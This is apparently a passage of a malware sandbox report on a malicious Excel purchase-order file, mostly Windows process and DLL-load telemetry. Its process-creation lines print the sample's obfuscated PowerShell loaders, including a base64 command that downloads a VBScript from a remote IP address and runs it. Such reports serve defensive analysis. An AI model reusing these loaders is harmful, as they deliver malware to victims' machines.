Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64cpu.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source: PO#BBGR2411PO69.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation

barindex
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
